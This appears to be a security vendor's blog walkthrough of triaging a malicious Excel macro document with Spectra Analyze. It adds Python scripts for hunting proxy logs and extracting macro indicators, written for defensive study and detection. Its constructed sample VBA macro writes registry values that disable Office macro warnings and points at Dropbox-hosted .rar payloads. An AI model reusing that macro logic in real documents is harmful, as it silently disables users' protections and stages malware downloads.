In our first installment of the RL Spectra Analyze In Action series, I used Spectra Analyze to triage an unknown malware sample. In this example analysis, let’s say a user has opened what they thought was a form from their college admissions office. In reality, this sample is a MalDoc in disguise, complete with a malicious Visual Basic for Applications (VBA) macro.
Microsoft Office allows for simple scripting via VBA, which is often used to automate repetitive tasks. Certain elements of VBA can be exploited for malicious activity, especially its API access, because these elements can be leveraged to communicate with external applications. This is great for an attacker seeking to abuse this functionality as C2 infrastructure or to download a secondary payload. Because macros are so easy to work with, they provide an approachable attack vector for a would-be threat actor and are commonly seen in the wild.
Here's a walk-through of the network indicator analysis feature of Spectra Analyze, along with Spectra Core’s advanced static analysis features to determine the behavior of the VBA macro.
Figure 1. MalDoc “UT.xls” as viewed by user.
During the triage process, interacting with a malicious document is a good method for making sure that macros or other content are executed, but it’s important to have a proper analysis environment set up to reduce the risk of infecting yourself.
To address this, open the UT.xls document in Spectra Analyze in an interactive sandbox session with the ReversingLabs Cloud Sandbox (RLCS), without having to set up an analysis environment of your own. As the name suggests, the option allows you to interact with the sample during the course of its detonation in the sandbox environment. If you do not wish to do so, you can run the session without this option enabled.
Figure 2. RLCS sample submission window with Interactive Analysis mode option.
After submitting the sample for analysis, you review the results of the RLCS session. The RLCS session has revealed a set of IP addresses, which means that during the sample’s runtime, it communicated with or otherwise referenced these addresses. These can be seen in the TCP Connections tab under the Network Analysis tab, shown below, in Figure 3. The next step is to determine exactly what those IPs are and how they're used by the malware.
Figure 3. Three referenced IP addresses as seen in RLCS report.
Clicking each of these IP addresses in the “Destination IP” column brings you to the IP Analysis view of Spectra Analyze, with details about the IP address in question, shown in Figure 4. For the address 162.125.9.18, the information available shows that this IP resolves to the Dropbox domain. This IP is not malicious on its own, but searching for this IP within your environment can help to narrow down a list of possibly infected endpoints.
This behavior is also a red flag that this is likely a malicious sample. Dropbox is a cloud storage service commonly used for filesharing. Cloud sharing services like Dropbox are abused by threat actors for hosting and sharing malicious payloads.
Figure 4. IP Analysis of one of the three referenced IP addresses.
Now that we’ve gone through Network Indicator Analysis, the triage process continues by delving into macro behavior. Spectra Core extracts file components from a malicious document, making it easy to find and analyze macros.
You can drill down and view the macro content of UT.xls via the Extracted Files tab of Static Analysis, filtering by the “Text/VBA” format.
Figure 5. VBA Macro as seen in filtered Extracted Files view.
The text preview of the extracted VBA macro (shown below, in Figure 6) reveals a set of payload download URLs that host the next stage of the malware. We can see two URL references to Dropbox, each pointing at a .rar file. This confirms what we suspected after reviewing the network indicator analysis report: this MalDoc is using Dropbox to host a malicious, secondary payload. We now have a combination of IP addresses and URLs that can be used to track down infected endpoints.
Figure 6. Plain text sample preview of the sample’s VBA macro as displayed by Spectra Analyze, Dropbox C2 URLs highlighted
We can turn these network indicator insights into an Advanced Search query for similar files, as shown in Figure 7 below. This search looks for .doc filetypes reaching out to either the Dropbox domain or the Dropbox IP address, as uncovered in Figures 3 and 4. Running this query yields 7 samples within the last year, shown below. Searching for these hashes within our environment would help us ensure there were no other similar attacks against our organization.
Figure 7. Advanced Search results of search developed with our uncovered network indicators.
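The post recommends searching for the uncovered network indicators within your own environment while cautioning that the Dropbox IP is not malicious on its own. The following added example (not part of the original post or the Spectra Analyze product) shows one way to do that over proxy logs: it matches destination IPs and hosts against the indicators from Figures 3, 4 and 6, and separates plain Dropbox traffic ("candidate" endpoints) from endpoints that also fetched a .rar archive, the payload type seen in the macro. The log lines, client addresses, user names and log format are constructed for the example; only the IP 162.125.9.18 and the Dropbox domain come from the post.

```python
from urllib.parse import urlparse

# Indicators taken from the post: the Dropbox-resolving IP (Figure 4) and the
# Dropbox domains referenced by the macro URLs (Figure 6). No hashes are given
# on the page, so this hunt uses network indicators only.
IOC_IPS = {"162.125.9.18"}
IOC_DOMAINS = {"dropbox.com", "dropboxusercontent.com"}

# Constructed proxy log sample (format assumed for this example):
# timestamp client_ip user dest_host dest_ip url bytes
SAMPLE_PROXY_LOG = """\
2024-05-01T09:12:03Z 10.1.4.22 alice www.dropbox.com 162.125.9.18 https://www.dropbox.com/s/EXAMPLE/stage2.rar?dl=1 412233
2024-05-01T09:12:40Z 10.1.4.22 alice www.dropbox.com 162.125.9.18 https://www.dropbox.com/home 8010
2024-05-01T09:15:11Z 10.1.7.90 bob www.dropbox.com 162.125.9.18 https://www.dropbox.com/home 7990
2024-05-01T09:20:45Z 10.1.2.15 carol updates.example.net 203.0.113.7 https://updates.example.net/patch.msi 99120
2024-05-01T09:22:02Z 10.1.9.33 dave dl.dropboxusercontent.com 162.125.9.18 https://dl.dropboxusercontent.com/s/EXAMPLE/payload.rar 410900
"""


def host_matches(host, domains):
    """True if host equals an indicator domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def parse_line(line):
    """Split one whitespace-delimited proxy record into a dict."""
    ts, client, user, host, dest_ip, url, size = line.split()
    return {"ts": ts, "client": client, "user": user, "host": host,
            "dest_ip": dest_ip, "url": url, "bytes": int(size)}


def hunt(log_text, ioc_ips=IOC_IPS, ioc_domains=IOC_DOMAINS):
    """Return endpoints that touched the indicators, keyed by client IP.

    Matching the Dropbox IP or domain alone only yields candidates, because the
    service is legitimately used. An archive (.rar) download from an indicator
    host, as the macro performs, raises the endpoint to high confidence.
    """
    endpoints = {}
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        ip_hit = rec["dest_ip"] in ioc_ips
        dom_hit = host_matches(rec["host"], ioc_domains)
        if not (ip_hit or dom_hit):
            continue
        entry = endpoints.setdefault(rec["client"], {
            "users": set(), "hits": 0, "archive_downloads": [], "confidence": "candidate"})
        entry["users"].add(rec["user"])
        entry["hits"] += 1
        if urlparse(rec["url"]).path.lower().endswith(".rar"):
            entry["archive_downloads"].append(rec["url"])
            entry["confidence"] = "high"
    return endpoints


if __name__ == "__main__":
    for client, info in sorted(hunt(SAMPLE_PROXY_LOG).items()):
        print(client, info["confidence"], info["hits"], sorted(info["users"]), info["archive_downloads"])
```

Endpoints reported as "candidate" still deserve a look (the second stage may have been fetched over a channel this log does not cover), but the high-confidence list is where response effort should go first.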
Without having to detonate this sample in a sandbox or analysis environment, Spectra Analyze's Static Analysis behavioral indicators can help pin down precisely what the malicious document does. Below, see how UT.xls tampers with the registry to hide its malicious activity.
Figure 8. Static Analysis Indicators tab within Spectra Analyze
In these indicators, note the hardcoded strings that the macro is using to tamper with the registry, along with the associated offsets in the files. Specifically, this registry activity disables the warnings that would ordinarily be displayed when opening a Microsoft Office file that runs a macro. You also see registry activity that disables any security settings that would prevent the macro from running. Threat actors often include this behavior in malicious macros so that they are able to run malicious code without tipping off the user that something nefarious is underway.
You can also see these strings in the text visualization, shown below. You could use these strings to build a YARA rule for threat hunting or detection purposes. (I'll dive into how to write effective YARA rules in a later installment in this series.)
Now that we know what to look for, we can pull registry indicators from the VBA script that can be used to find infected endpoints.
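The two extraction steps above, the payload URLs from the macro text (Figure 6) and the registry indicators that disable macro security (Figures 8 and 9), can be scripted so that the same indicators are pulled from every macro you extract. The following is an added example and not code from the post or from Spectra Analyze; the macro text is a constructed stand-in that reproduces the behaviors the post describes, not the real UT.xls macro. The registry value names VBAWarnings and AccessVBOM are the standard Office per-user settings that control macro warnings and VBA object-model access; the post itself does not name the values it found, so treat that mapping as the example's assumption about what "disabling the warnings" looks like in a macro.

```python
import re
from urllib.parse import urlparse

# Constructed sample macro text modeled on the behaviors described in the post.
# Not the UT.xls macro; the URLs and share IDs are placeholders.
SAMPLE_MACRO = r'''
Sub Workbook_Open()
    Dim sh As Object
    Set sh = CreateObject("WScript.Shell")
    ' Silence the macro warning bar and allow access to the VBA object model
    sh.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
    sh.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM", 1, "REG_DWORD"
    ' Second-stage payload hosted on a cloud sharing service
    Dim u1 As String, u2 As String
    u1 = "https://www.dropbox.com/s/EXAMPLE1/stage2.rar?dl=1"
    u2 = "https://dl.dropboxusercontent.com/s/EXAMPLE2/stage2.rar"
    Call Fetch(u1)
End Sub
'''

URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)
# WScript.Shell.RegWrite "<key>", <value>, "<type>"  (value captured up to the next comma)
REGWRITE_RE = re.compile(r'RegWrite\s+"([^"]+)"\s*,\s*([^,\n]+)', re.IGNORECASE)

# Office Security values that, when set to 1, weaken macro protections (assumed mapping).
SECURITY_VALUES = {
    "vbawarnings": "disables macro security warnings (1 = enable all macros)",
    "accessvbom": "grants programmatic access to the VBA object model",
}


def extract_urls(macro_text):
    """Unique URL literals found anywhere in the macro source."""
    return sorted(set(URL_RE.findall(macro_text)))


def extract_registry_tampering(macro_text):
    """RegWrite calls whose target is one of the known macro-security values."""
    findings = []
    for key, value in REGWRITE_RE.findall(macro_text):
        name = key.rsplit("\\", 1)[-1].lower()
        if name in SECURITY_VALUES:
            findings.append({"key": key, "value": value.strip(), "why": SECURITY_VALUES[name]})
    return findings


def triage_macro(macro_text):
    """Collect the network and registry indicators the post's triage relies on."""
    urls = extract_urls(macro_text)
    hosts = sorted({urlparse(u).netloc.lower() for u in urls})
    return {
        "urls": urls,
        "hosts": hosts,
        # Archive payloads on a file-sharing service, matching the pattern in Figure 6
        "cloud_hosted_payloads": [u for u in urls
                                  if "dropbox" in u.lower() and urlparse(u).path.lower().endswith(".rar")],
        "registry_tampering": extract_registry_tampering(macro_text),
    }


if __name__ == "__main__":
    result = triage_macro(SAMPLE_MACRO)
    for section, items in result.items():
        print(section)
        for item in items:
            print("   ", item)
```

The hosts and URLs feed the endpoint hunt, and the registry keys give you a second, host-based indicator: a user-hive VBAWarnings value set to 1 on a workstation that never had macros enabled by policy is worth investigating even if no network evidence survived.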
Figure 9. Plain text sample preview of the sample’s VBA macro as displayed by Spectra Analyze, registry keywords highlighted.
This particular VBA script has been reused in other malicious documents in a campaign from the same adversary. The file relationships tab of Spectra Analyze can be used to find these other documents along with the file indicators needed to search for them within our organization.
Figure 10 shows two additional documents that contain this same malicious VBA macro.
Figure 10. Related documents, as viewed in Spectra Analyze relationships tab.
In a more generalized hunt, you could also use the behavioral indicator codes for the Evasion technique to find many more VBA files that exhibit the same behavior and call out to Dropbox. It’s likely that many of these samples are malicious, and we could hunt for these files in our environment to determine whether there is any further compromise beyond the initial MalDoc.
Spectra Core’s indicator codes used in this advanced search correspond to the description of the behavior and can be looked up in the documentation.
Figure 11. Behavioral Indicator Advanced Search, looking for VBA macros that contact the Dropbox domain and exhibit behavior as defined by indicators above.
An example of a generalized hunt can be seen above, in Figure 11. This hunt returns samples that behave similarly to UT.xls, but they are not necessarily from the same campaign or produced by the same threat actor. If you are seeking to use the insights gleaned from this investigation, limiting the hunt to the specific IOCs seen in a single campaign may not be enough to adequately address the compromise. Other samples behaving similarly may have made it through our defenses, and broadening the investigation will help determine whether or not this was the case. If we were to find other similar samples that have breached our defenses, that would be a strong indication that our organizational security posture should be adjusted.
Spectra Analyze is a powerful tool for MalDoc investigations. Features like network indicator analysis and Static Analysis are useful in streamlining investigations like the one featured in this analysis.
In the first two installments of this series, we’ve demonstrated how Spectra Analyze can be used to triage both executable malware and malicious Office files. In our next installment, I'll go deep into YARA for threat hunting, including developing YARA rules and how you can evaluate the quality of publicly available YARA rules.
Explore RL's Spectra suite: Spectra Assure for software supply chain security, Spectra Detect for scalable file analysis, Spectra Analyze for malware analysis and threat hunting, and Spectra Intelligence for reputation data and intelligence.